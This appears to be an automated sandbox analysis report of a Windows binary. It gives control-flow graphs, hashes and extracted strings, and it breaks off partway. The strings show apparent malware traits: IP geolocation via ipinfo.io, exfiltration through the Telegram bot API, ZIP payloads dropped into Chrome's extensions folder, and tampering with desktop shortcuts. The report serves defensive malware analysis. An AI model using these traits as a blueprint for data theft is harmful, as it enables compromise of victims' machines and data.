                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: "$Extracted: $Failed to create output file: $Failed to extract entry: $Failed to get entry info for index: $Failed to initialize ZIP archive: $Failed to open ZIP file: $create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                          • API String ID: 1686256323-3304824404
                                                                                                                                                                                                                                                                                          • Opcode ID: ca601215968a881bfc8d844b289b2e5e2cea346b4ae4ab5881baf2d2748eeb92
                                                                                                                                                                                                                                                                                          • Instruction ID: 262e3c0aa39bbba204c777d7510d745987af219b60a15f1e7c7dde0c7b7bb661
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca601215968a881bfc8d844b289b2e5e2cea346b4ae4ab5881baf2d2748eeb92
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA2E372A0CB86C5EB50BF25C5423EC2361FB457A8F504631DA6CA7ADAEF79E185D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                                                                                                                                          • String ID: .lck$.zip$C:\Program Files\Google\Chrome\Extensions$Download failed$Extensions count: $Profiles count: $create_directories$exists$remove
                                                                                                                                                                                                                                                                                          • API String ID: 3708190391-83527870
                                                                                                                                                                                                                                                                                          • Opcode ID: 395d995e25c899ef3dd9c793b388adef5e14986ec9ff63cdf41a4b5fc1a7c61e
                                                                                                                                                                                                                                                                                          • Instruction ID: 408b4a08b569ad015739debee43255fe77d97c2b8db01131d73142ec7795b2fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 395d995e25c899ef3dd9c793b388adef5e14986ec9ff63cdf41a4b5fc1a7c61e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2A2D462A1CB8285EB50BF64D5423ED2761FB55798F105331EA6D67BDADF78E080E300

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 4249 7ff643f33ce0-7ff643f33db7 call 7ff643f63600 call 7ff643f444a0 * 2 InternetOpenA 4256 7ff643f33dbd-7ff643f33e04 call 7ff643f41b10 call 7ff643f41dc0 call 7ff643f3f4e0 * 2 4249->4256 4257 7ff643f33eaf-7ff643f33ed8 InternetOpenUrlA 4249->4257 4293 7ff643f33e06-7ff643f33e1a 4256->4293 4294 7ff643f33e3b-7ff643f33e46 4256->4294 4259 7ff643f33eda-7ff643f33f1e call 7ff643f41b10 call 7ff643f41dc0 InternetCloseHandle call 7ff643f3f4e0 * 2 4257->4259 4260 7ff643f33f24-7ff643f33f66 InternetReadFile 4257->4260 4259->4260 4262 7ff643f33f68 4260->4262 4263 7ff643f33fde-7ff643f341e2 InternetCloseHandle * 2 call 7ff643f899f0 call 7ff643f41370 call 7ff643f41080 call 7ff643f40980 call 7ff643f58bc0 * 2 call 7ff643f51f30 call 7ff643f527f0 4260->4263 4268 7ff643f33f70-7ff643f33f78 4262->4268 4337 7ff643f341e8-7ff643f34273 call 7ff643f58bc0 call 7ff643f574c0 call 7ff643f592e0 call 7ff643f58c50 call 7ff643f58e50 call 7ff643f57c70 4263->4337 4338 7ff643f34a52-7ff643f34a93 call 7ff643f41b10 call 7ff643f46670 call 7ff643f41dc0 4263->4338 4268->4263 4272 7ff643f33f7a-7ff643f33f80 4268->4272 4276 7ff643f33f86-7ff643f33f9c 4272->4276 4277 7ff643f34c51-7ff643f34c56 call 7ff643f628a0 4272->4277 4282 7ff643f33fa0-7ff643f33fa8 4276->4282 4288 7ff643f34c57-7ff643f34c5c call 7ff643f6cd30 4277->4288 4282->4282 4287 7ff643f33faa-7ff643f33fdc call 7ff643f408c0 InternetReadFile 4282->4287 4287->4263 4287->4268 4307 7ff643f34c5d-7ff643f34c62 call 7ff643f6cd30 4288->4307 4299 7ff643f33e1c-7ff643f33e2f 4293->4299 4300 7ff643f33e35-7ff643f33e3a call 7ff643f62790 4293->4300 4302 7ff643f33e48-7ff643f33e5c 4294->4302 4303 7ff643f33e7c-7ff643f33eae call 7ff643f62770 4294->4303 4299->4300 4305 7ff643f34c3f-7ff643f34c44 call 7ff643f6cd30 4299->4305 4300->4294 4308 7ff643f33e77 call 7ff643f62790 4302->4308 4309 7ff643f33e5e-7ff643f33e71 4302->4309 4315 7ff643f34c45-7ff643f34c4a call 7ff643f6cd30 4305->4315 4323 7ff643f34c63-7ff643f34c68 call 7ff643f6cd30 4307->4323 4308->4303 4309->4308 4309->4315 4327 7ff643f34c4b-7ff643f34c50 call 7ff643f6cd30 4315->4327 4333 7ff643f34c69-7ff643f34c6e call 7ff643f6cd30 4323->4333 4327->4277 4342 7ff643f34c6f-7ff643f34c74 call 7ff643f6cd30 4333->4342 4383 7ff643f342da-7ff643f342e3 4337->4383 4384 7ff643f34275-7ff643f34280 4337->4384 4362 7ff643f34a98-7ff643f34a9e 4338->4362 4349 7ff643f34c75-7ff643f34c7a call 7ff643f6cd30 4342->4349 4358 7ff643f34c7b-7ff643f34c80 call 7ff643f6cd30 4349->4358 4367 7ff643f34c81-7ff643f34c86 call 7ff643f6cd30 4358->4367 4365 7ff643f34aac-7ff643f34abd 4362->4365 4366 7ff643f34aa0-7ff643f34aa7 call 7ff643f6c0fc 4362->4366 4370 7ff643f34ae8-7ff643f34b6d call 7ff643f3cf20 call 7ff643f60ad8 4365->4370 4371 7ff643f34abf-7ff643f34ae7 call 7ff643f62a74 call 7ff643f62790 4365->4371 4366->4365 4382 7ff643f34c87-7ff643f34c8f call 7ff643f6cd30 4367->4382 4396 7ff643f34b6f-7ff643f34b83 4370->4396 4397 7ff643f34ba3-7ff643f34bc7 4370->4397 4371->4370 4388 7ff643f34317-7ff643f3433a call 7ff643f58de0 4383->4388 4389 7ff643f342e5-7ff643f342f7 4383->4389 4385 7ff643f342b6-7ff643f342d7 4384->4385 4386 7ff643f34282-7ff643f34296 4384->4386 4385->4383 4392 7ff643f34298-7ff643f342ab 4386->4392 4393 7ff643f342b1 call 7ff643f62790 4386->4393 4409 7ff643f3433c-7ff643f34364 call 7ff643f62a74 call 7ff643f62790 4388->4409 4410 7ff643f34365-7ff643f34377 call 7ff643f58de0 4388->4410 4394 7ff643f342f9-7ff643f3430c 4389->4394 4395 7ff643f34312 call 7ff643f62790 4389->4395 4392->4327 4392->4393 4393->4385 4394->4327 4394->4395 4395->4388 4402 7ff643f34b9e call 7ff643f62790 4396->4402 4403 7ff643f34b85-7ff643f34b98 4396->4403 4405 7ff643f34bc9-7ff643f34bdd 4397->4405 4406 7ff643f34bfa-7ff643f34c05 4397->4406 4402->4397 4403->4382 4403->4402 4411 7ff643f34bdf-7ff643f34bf2 4405->4411 4412 7ff643f34bf4-7ff643f34bf9 call 7ff643f62790 4405->4412 4406->4303 4407 7ff643f34c0b-7ff643f34c1f 4406->4407 4407->4308 4415 7ff643f34c25-7ff643f34c38 4407->4415 4409->4410 4422 7ff643f34379-7ff643f3439c call 7ff643f62a74 call 7ff643f62790 4410->4422 4423 7ff643f343a1-7ff643f345d2 call 7ff643f58bc0 call 7ff643f574c0 call 7ff643f592e0 call 7ff643f58c50 call 7ff643f58e50 call 7ff643f57c70 call 7ff643f58bc0 call 7ff643f574c0 call 7ff643f592e0 call 7ff643f58c50 call 7ff643f58e50 call 7ff643f57c70 call 7ff643f58bc0 call 7ff643f574c0 call 7ff643f592e0 call 7ff643f58c50 call 7ff643f58e50 call 7ff643f57c70 call 7ff643f408c0 call 7ff643f45ef0 call 7ff643f408c0 call 7ff643f45ef0 4410->4423 4411->4305 4411->4412 4412->4406 4415->4315 4419 7ff643f34c3a 4415->4419 4419->4308 4422->4423 4472 7ff643f34608-7ff643f34626 4423->4472 4473 7ff643f345d4-7ff643f345e8 4423->4473 4476 7ff643f34628-7ff643f34639 4472->4476 4477 7ff643f3465a-7ff643f34663 4472->4477 4474 7ff643f345ea-7ff643f345fd 4473->4474 4475 7ff643f34603 call 7ff643f62790 4473->4475 4474->4288 4474->4475 4475->4472 4481 7ff643f3463b-7ff643f3464e 4476->4481 4482 7ff643f34654-7ff643f34659 call 7ff643f62790 4476->4482 4478 7ff643f34697-7ff643f346b3 4477->4478 4479 7ff643f34665-7ff643f34677 4477->4479 4485 7ff643f346e8-7ff643f346f0 4478->4485 4486 7ff643f346b5-7ff643f346c7 4478->4486 4483 7ff643f34679-7ff643f3468c 4479->4483 4484 7ff643f34692 call 7ff643f62790 4479->4484 4481->4307 4481->4482 4482->4477 4483->4323 4483->4484 4484->4478 4491 7ff643f346f2-7ff643f34703 4485->4491 4492 7ff643f34723-7ff643f34743 call 7ff643f58de0 4485->4492 4489 7ff643f346c9-7ff643f346dc 4486->4489 4490 7ff643f346e2-7ff643f346e7 call 7ff643f62790 4486->4490 4489->4333 4489->4490 4490->4485 4496 7ff643f3471e call 7ff643f62790 4491->4496 4497 7ff643f34705-7ff643f34718 4491->4497 4501 7ff643f3476e-7ff643f3477e call 7ff643f58de0 4492->4501 4502 7ff643f34745-7ff643f3476d call 7ff643f62a74 call 7ff643f62790 4492->4502 4496->4492 4497->4342 4497->4496 4508 7ff643f347a9-7ff643f347b1 4501->4508 4509 7ff643f34780-7ff643f347a8 call 7ff643f62a74 call 7ff643f62790 4501->4509 4502->4501 4510 7ff643f347e4-7ff643f34807 call 7ff643f58de0 4508->4510 4511 7ff643f347b3-7ff643f347c4 4508->4511 4509->4508 4521 7ff643f34809-7ff643f34831 call 7ff643f62a74 call 7ff643f62790 4510->4521 4522 7ff643f34832-7ff643f34848 call 7ff643f58de0 4510->4522 4514 7ff643f347c6-7ff643f347d9 4511->4514 4515 7ff643f347df call 7ff643f62790 4511->4515 4514->4349 4514->4515 4515->4510 4521->4522 4528 7ff643f3484a-7ff643f34872 call 7ff643f62a74 call 7ff643f62790 4522->4528 4529 7ff643f34873-7ff643f3487b 4522->4529 4528->4529 4532 7ff643f3487d-7ff643f3488e 4529->4532 4533 7ff643f348ae-7ff643f348d4 call 7ff643f58de0 4529->4533 4536 7ff643f348a9 call 7ff643f62790 4532->4536 4537 7ff643f34890-7ff643f348a3 4532->4537 4543 7ff643f348d6-7ff643f348fe call 7ff643f62a74 call 7ff643f62790 4533->4543 4544 7ff643f348ff-7ff643f34915 call 7ff643f58de0 4533->4544 4536->4533 4537->4358 4537->4536 4543->4544 4550 7ff643f34917-7ff643f3493a call 7ff643f62a74 call 7ff643f62790 4544->4550 4551 7ff643f3493f-7ff643f34972 call 7ff643f3f4e0 * 2 4544->4551 4550->4551 4560 7ff643f349a8-7ff643f349e5 call 7ff643f58de0 4551->4560 4561 7ff643f34974-7ff643f34988 4551->4561 4567 7ff643f349e7-7ff643f34a0f call 7ff643f62a74 call 7ff643f62790 4560->4567 4568 7ff643f34a10-7ff643f34a1c 4560->4568 4563 7ff643f3498a-7ff643f3499d 4561->4563 4564 7ff643f349a3 call 7ff643f62790 4561->4564 4563->4367 4563->4564 4564->4560 4567->4568 4568->4362 4570 7ff643f34a1e-7ff643f34a21 4568->4570 4572 7ff643f34a2c-7ff643f34a36 4570->4572 4573 7ff643f34a23-7ff643f34a26 4570->4573 4572->4365 4575 7ff643f34a38-7ff643f34a50 call 7ff643f5a060 call 7ff643f62790 4572->4575 4573->4365 4573->4572 4575->4365
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseHandle$FileOpenRead
                                                                                                                                                                                                                                                                                          • String ID: Could not fetch IP$Error parsing JSON response: $IPInfoFetcher$InternetOpen failed.$InternetOpenUrl failed.$Location not available$N/A$city$country$https://ipinfo.io/json$region
                                                                                                                                                                                                                                                                                          • API String ID: 427349759-3899726476
                                                                                                                                                                                                                                                                                          • Opcode ID: 1f02335d04f10409e37e00b66a2d6d8842639688e42a5788f78dd1e5a12e55ce
                                                                                                                                                                                                                                                                                          • Instruction ID: 547495b46da262665c10a3b68e75d83ab87a4a830ffe322c959ef618ce1fa214
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f02335d04f10409e37e00b66a2d6d8842639688e42a5788f78dd1e5a12e55ce
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4592B322A1C7C295EB60FF64D8523ED2361EB45798F505631DA1DABADADF3CD281E300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisCreateFileInitializeInstance
                                                                                                                                                                                                                                                                                          • String ID: does not exist or is not accessible.$C:\Users$Failed to create ShellLink COM object.$Failed to get IPersistFile interface.$Failed to save shortcut file.$The directory $User: $directory_entry::status$directory_iterator::directory_iterator$exists$status
                                                                                                                                                                                                                                                                                          • API String ID: 2171753736-278810226
                                                                                                                                                                                                                                                                                          • Opcode ID: 08b54cf656a112a2754771785b4b71a2edcbde101545a1cba5b01f5e624e08e0
                                                                                                                                                                                                                                                                                          • Instruction ID: 4b4f025659fe7477e860ceb9bbd5e0bb1fc2617f0d035aa311c6cc4e0f5ed54f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08b54cf656a112a2754771785b4b71a2edcbde101545a1cba5b01f5e624e08e0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7272C062F1CB82C5EB50BB65D5422ED2361EB85BA8F504631DE5CA3BE9DF39E481D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseConcurrency::cancel_current_taskDeleteEnvironmentFirstNextVariable
                                                                                                                                                                                                                                                                                          • String ID: .lnk$C:\Users\$Deleted: $Error finding user directories$Failed to delete: $USERPROFILE$\Desktop$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                                                                                                                                          • API String ID: 1014275803-3111992417
                                                                                                                                                                                                                                                                                          • Opcode ID: 065c89a1d72a24bc2d3c70620168c6c6ecb5cc03ceeb2eba9924551621a46ecd
                                                                                                                                                                                                                                                                                          • Instruction ID: 2391cdd757d315ec44147e90630489c2c3ee3036825bd6a360666c445d507f6e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 065c89a1d72a24bc2d3c70620168c6c6ecb5cc03ceeb2eba9924551621a46ecd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C72B372A1CBC2C1EEA0BB15E5423EE6361EB857A4F404231DAADA3AD5DF7DD484D700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 5263 7ff643f34d20-7ff643f34d90 call 7ff643f63600 InternetOpenA 5266 7ff643f34d96-7ff643f34dc5 call 7ff643f444a0 5263->5266 5267 7ff643f34e2b-7ff643f34e47 5263->5267 5273 7ff643f34df9-7ff643f34e2a call 7ff643f62770 5266->5273 5274 7ff643f34dc7-7ff643f34dd9 5266->5274 5269 7ff643f34e49-7ff643f34e4f 5267->5269 5270 7ff643f34e51 5267->5270 5272 7ff643f34e54-7ff643f34e61 5269->5272 5270->5272 5275 7ff643f34f08-7ff643f34f1d 5272->5275 5276 7ff643f34e67 5272->5276 5277 7ff643f34ddb-7ff643f34dee 5274->5277 5278 7ff643f34df4 call 7ff643f62790 5274->5278 5280 7ff643f3541a-7ff643f3541f call 7ff643f22410 5275->5280 5281 7ff643f34f23-7ff643f34f28 5275->5281 5282 7ff643f34e70-7ff643f34e7d call 7ff643f69430 5276->5282 5277->5278 5286 7ff643f35414-7ff643f35419 call 7ff643f6cd30 5277->5286 5278->5273 5294 7ff643f35420-7ff643f35425 call 7ff643f6cd30 5280->5294 5283 7ff643f34f2d-7ff643f34fa1 call 7ff643f460e0 call 7ff643f408c0 5281->5283 5284 7ff643f34f2a 5281->5284 5295 7ff643f34e7f-7ff643f34e8a 5282->5295 5296 7ff643f34ec2-7ff643f34ede call 7ff643f22210 5282->5296 5311 7ff643f34fa6-7ff643f350b6 call 7ff643f408c0 * 4 5283->5311 5312 7ff643f34fa3 5283->5312 5284->5283 5286->5280 5309 7ff643f35426-7ff643f3542b call 7ff643f6cd30 5294->5309 5300 7ff643f34e8c-7ff643f34ea9 5295->5300 5301 7ff643f34eab-7ff643f34ec0 call 7ff643f448f0 5295->5301 5313 7ff643f34ee5-7ff643f34eed 5296->5313 5305 7ff643f34efc-7ff643f34f02 5300->5305 5301->5305 5305->5275 5305->5282 5320 7ff643f3542c-7ff643f35431 call 7ff643f6cd30 5309->5320 5332 7ff643f350b8-7ff643f350c9 5311->5332 5333 7ff643f350e9-7ff643f35102 5311->5333 5312->5311 5313->5313 5316 7ff643f34eef-7ff643f34ef7 call 7ff643f408c0 5313->5316 5316->5305 5326 7ff643f35432-7ff643f35437 call 7ff643f6cd30 5320->5326 5334 7ff643f35438-7ff643f3543d call 7ff643f6cd30 5326->5334 5335 7ff643f350cb-7ff643f350de 5332->5335 5336 7ff643f350e4 call 7ff643f62790 5332->5336 5337 7ff643f35104-7ff643f35115 5333->5337 5338 7ff643f35135-7ff643f35146 5333->5338 5351 7ff643f3543e-7ff643f35443 call 7ff643f6cd30 5334->5351 5335->5294 5335->5336 5336->5333 5341 7ff643f35117-7ff643f3512a 5337->5341 5342 7ff643f35130 call 7ff643f62790 5337->5342 5343 7ff643f35148-7ff643f35159 5338->5343 5344 7ff643f35179-7ff643f3518b 5338->5344 5341->5309 5341->5342 5342->5338 5347 7ff643f3515b-7ff643f3516e 5343->5347 5348 7ff643f35174 call 7ff643f62790 5343->5348 5349 7ff643f3518d-7ff643f3519f 5344->5349 5350 7ff643f351bf-7ff643f351d2 5344->5350 5347->5320 5347->5348 5348->5344 5352 7ff643f351ba call 7ff643f62790 5349->5352 5353 7ff643f351a1-7ff643f351b4 5349->5353 5355 7ff643f351d4-7ff643f351e5 5350->5355 5356 7ff643f35205-7ff643f3523e InternetOpenUrlA 5350->5356 5364 7ff643f35444-7ff643f35449 call 7ff643f628a0 5351->5364 5352->5350 5353->5326 5353->5352 5360 7ff643f351e7-7ff643f351fa 5355->5360 5361 7ff643f35200 call 7ff643f62790 5355->5361 5362 7ff643f3531f-7ff643f35351 call 7ff643f444a0 5356->5362 5363 7ff643f35244-7ff643f3525d InternetReadFile 5356->5363 5360->5334 5360->5361 5361->5356 5370 7ff643f35385-7ff643f35397 InternetCloseHandle 5362->5370 5374 7ff643f35353-7ff643f35365 5362->5374 5367 7ff643f35314-7ff643f3531d InternetCloseHandle 5363->5367 5368 7ff643f35263-7ff643f35268 5363->5368 5381 7ff643f3544a-7ff643f3544f call 7ff643f6cd30 5364->5381 5367->5370 5368->5367 5372 7ff643f3526e-7ff643f35274 5368->5372 5376 7ff643f35399-7ff643f353aa 5370->5376 5377 7ff643f353c6-7ff643f353d7 5370->5377 5372->5364 5375 7ff643f3527a-7ff643f3529c 5372->5375 5382 7ff643f35367-7ff643f3537a 5374->5382 5383 7ff643f35380 call 7ff643f62790 5374->5383 5384 7ff643f352a0-7ff643f352a8 5375->5384 5378 7ff643f353ac-7ff643f353bf 5376->5378 5379 7ff643f353c1 call 7ff643f62790 5376->5379 5377->5273 5380 7ff643f353dd-7ff643f353ee 5377->5380 5378->5379 5385 7ff643f3540e-7ff643f35413 call 7ff643f6cd30 5378->5385 5379->5377 5380->5278 5387 7ff643f353f4-7ff643f35407 5380->5387 5382->5381 5382->5383 5383->5370 5384->5384 5390 7ff643f352aa-7ff643f352c1 call 7ff643f444a0 5384->5390 5385->5286 5387->5286 5391 7ff643f35409 5387->5391 5397 7ff643f352f5-7ff643f3530e InternetReadFile 5390->5397 5398 7ff643f352c3-7ff643f352d5 5390->5398 5391->5278 5397->5367 5397->5368 5399 7ff643f352d7-7ff643f352ea 5398->5399 5400 7ff643f352f0 call 7ff643f62790 5398->5400 5399->5351 5399->5400 5400->5397
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseFileHandleOpenRead
                                                                                                                                                                                                                                                                                          • String ID: %%%02X$&parse_mode=HTML$&text=$/sendMessage?chat_id=$InternetOpen failed.$InternetOpenUrl failed.$TelegramBot$https://api.telegram.org/bot
                                                                                                                                                                                                                                                                                          • API String ID: 490362910-2071712312
                                                                                                                                                                                                                                                                                          • Opcode ID: 0112b3fe0ccf7d40b14a75b7af19f0e01c5f05e3558ed60759056e54dfdfff20
                                                                                                                                                                                                                                                                                          • Instruction ID: 20e7cd0e76f538f8e7b5eaa91ba82d0079600e8a8c4d60d0b453b0f0ff820cd6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0112b3fe0ccf7d40b14a75b7af19f0e01c5f05e3558ed60759056e54dfdfff20
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB12A362E1CB8285EB40FB75D5423BD6761FB957A8F105331EA6C67AD6DF78E080A300

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 5402 7ff643f26190-7ff643f261ec call 7ff643f63600 5405 7ff643f262f7-7ff643f262fe 5402->5405 5406 7ff643f261f2-7ff643f26200 5402->5406 5409 7ff643f2631a-7ff643f26328 5405->5409 5410 7ff643f26300-7ff643f26309 5405->5410 5407 7ff643f26757-7ff643f2675c call 7ff643f22410 5406->5407 5408 7ff643f26206-7ff643f2620b 5406->5408 5425 7ff643f2675d-7ff643f26762 call 7ff643f6cd30 5407->5425 5412 7ff643f2620d 5408->5412 5413 7ff643f26210-7ff643f26274 call 7ff643f460e0 call 7ff643f408c0 5408->5413 5416 7ff643f2632e-7ff643f26368 call 7ff643f460e0 5409->5416 5417 7ff643f26751-7ff643f26756 call 7ff643f22410 5409->5417 5414 7ff643f2630b 5410->5414 5415 7ff643f2630e-7ff643f26315 call 7ff643f406d0 5410->5415 5412->5413 5441 7ff643f26276-7ff643f26287 5413->5441 5442 7ff643f262b1-7ff643f262c1 5413->5442 5414->5415 5415->5409 5427 7ff643f2636a-7ff643f2637c 5416->5427 5428 7ff643f2639c-7ff643f263aa 5416->5428 5417->5407 5440 7ff643f26763-7ff643f26768 call 7ff643f6cd30 5425->5440 5431 7ff643f26397 call 7ff643f62790 5427->5431 5432 7ff643f2637e-7ff643f26391 5427->5432 5428->5417 5433 7ff643f263b0-7ff643f263b8 5428->5433 5431->5428 5432->5431 5436 7ff643f26769-7ff643f2676f call 7ff643f6cd30 5432->5436 5438 7ff643f263ba 5433->5438 5439 7ff643f263bd-7ff643f263e9 call 7ff643f460e0 5433->5439 5438->5439 5457 7ff643f263eb-7ff643f263fd 5439->5457 5458 7ff643f2641d-7ff643f26440 InternetOpenA 5439->5458 5440->5436 5447 7ff643f26289-7ff643f2629c 5441->5447 5448 7ff643f262a2-7ff643f262ac call 7ff643f62790 5441->5448 5442->5409 5443 7ff643f262c3-7ff643f262d5 5442->5443 5450 7ff643f262d7-7ff643f262ea 5443->5450 5451 7ff643f262f0-7ff643f262f5 call 7ff643f62790 5443->5451 5447->5425 5447->5448 5448->5442 5450->5440 5450->5451 5451->5409 5462 7ff643f26418 call 7ff643f62790 5457->5462 5463 7ff643f263ff-7ff643f26412 5457->5463 5459 7ff643f264b1-7ff643f264e1 InternetOpenUrlA 5458->5459 5460 7ff643f26442-7ff643f26474 call 7ff643f444a0 5458->5460 5465 7ff643f264e3-7ff643f26515 call 7ff643f444a0 5459->5465 5466 7ff643f26552-7ff643f2655a 5459->5466 5472 7ff643f266e9 5460->5472 5473 